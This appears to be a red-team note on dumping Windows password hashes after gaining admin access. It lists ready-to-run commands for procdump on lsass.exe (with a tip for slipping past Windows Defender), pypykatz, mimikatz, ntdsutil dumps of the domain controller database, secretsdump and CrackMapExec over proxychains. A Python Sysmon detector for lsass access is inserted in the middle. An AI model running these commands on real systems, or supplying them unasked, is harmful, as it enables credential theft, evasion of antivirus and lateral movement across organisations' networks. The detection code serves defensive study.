After getting admin access, one of the first things you should try is to extract password hashes. Having these at hand is pivotal for moving laterally in the network.

Sysinternals’ procdump can be used to take a memory dump of the lsass.exe process. Be careful though: this has been known to trip Windows Defender. If you have fast enough fingers, you can copy the dump file before it gets deleted by Defender.

procdump -accepteula -ma lsass.exe lsass.dmp

Bypass Windows Defender by specifying a PID instead of the process name.

tasklist | findstr lsass.exe
procdump -accepteula -ma PID lsass.dmp
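From the detection side, both procdump variants above look the same: Sysmon Event ID 10 (ProcessAccess) records every handle opened on lsass.exe together with the granted access mask, and whether procdump was given a name or a PID makes no difference at that level. The following is an added example (not part of the original notes) that flags such events from constructed sample log lines; the '|'-separated field layout and the baseline of benign source images are assumptions for the example.

```python
from typing import Dict, List

# Access right a process needs in order to read another process's memory
# (a full dump such as procdump's cannot be taken without it).
PROCESS_VM_READ = 0x0010

# Source images that legitimately open lsass.exe on a typical host.
# Assumed baseline for this example; tune it to your own environment.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\programdata\microsoft\windows defender\platform\msmpeng.exe",
}

def parse_sysmon_event(line: str) -> Dict[str, str]:
    """Parse one flattened Sysmon event ('Key: value' pairs separated by '|')."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition(":")  # split on the first ':' only; paths keep theirs
        fields[key.strip()] = value.strip()
    return fields

def is_lsass_read(event: Dict[str, str]) -> bool:
    """True for an Event ID 10 where a non-baseline image obtained VM_READ on lsass.exe."""
    if event.get("EventID") != "10":
        return False
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0"), 16)  # hex mask such as 0x1FFFFF
    if not granted & PROCESS_VM_READ:
        return False
    return event.get("SourceImage", "").lower() not in BENIGN_SOURCES

def find_lsass_access(lines: List[str]) -> List[Dict[str, str]]:
    """Return the events that should raise an alert."""
    return [e for e in (parse_sysmon_event(l) for l in lines) if is_lsass_read(e)]

# Constructed sample events (not real telemetry). The first mirrors a
# procdump full dump of lsass; the others are benign or unrelated.
SAMPLE_EVENTS = [
    r"EventID: 10|SourceImage: C:\Tools\procdump64.exe|TargetImage: C:\Windows\system32\lsass.exe|GrantedAccess: 0x1FFFFF",
    r"EventID: 10|SourceImage: C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe|TargetImage: C:\Windows\system32\lsass.exe|GrantedAccess: 0x1410",
    r"EventID: 10|SourceImage: C:\Windows\System32\svchost.exe|TargetImage: C:\Windows\system32\lsass.exe|GrantedAccess: 0x1000",
    r"EventID: 10|SourceImage: C:\Windows\System32\taskmgr.exe|TargetImage: C:\Windows\system32\svchost.exe|GrantedAccess: 0x1FFFFF",
    r"EventID: 1|Image: C:\Tools\procdump64.exe|CommandLine: procdump -accepteula -ma 712 lsass.dmp",
]

if __name__ == "__main__":
    for hit in find_lsass_access(SAMPLE_EVENTS):
        print(f"ALERT: {hit['SourceImage']} opened lsass.exe with {hit['GrantedAccess']}")
```

Only the procdump event is reported; the Defender engine is on the baseline, the svchost.exe handle lacks VM_READ, and the remaining two do not target lsass.exe at all.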

Extract hashes from lsass.dmp using pypykatz.

pip3 install pypykatz
pypykatz lsa minidump lsass.dmp

You can also use mimikatz, one of the most popular tools for dumping Windows hashes.

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam" "lsadump::secrets"'

It’s also possible to dump Active Directory domain controller hashes.

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\windows\temp\dmp' q q"

Copy the dumped hive files and extract hashes locally using secretsdump.py.

secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY local

Remote dumping is possible, but you need valid credentials and access to the internal network.

proxychains4 -q secretsdump.py DOMAIN/USER:'PASSWORD'@HOST
Invoke-Mimikatz -Computer 'DC01.DOMAIN.LOCAL' -Command '"token::elevate" "lsadump::sam" "lsadump::secrets"'

Via CrackMapExec.

pip install crackmapexec

proxychains -q crackmapexec smb HOST -u USER -p 'PASSWORD' -M mimikatz
proxychains -q crackmapexec smb HOST -u USER -p 'PASSWORD' --sam
proxychains -q crackmapexec smb HOST -u USER -p 'PASSWORD' --lsa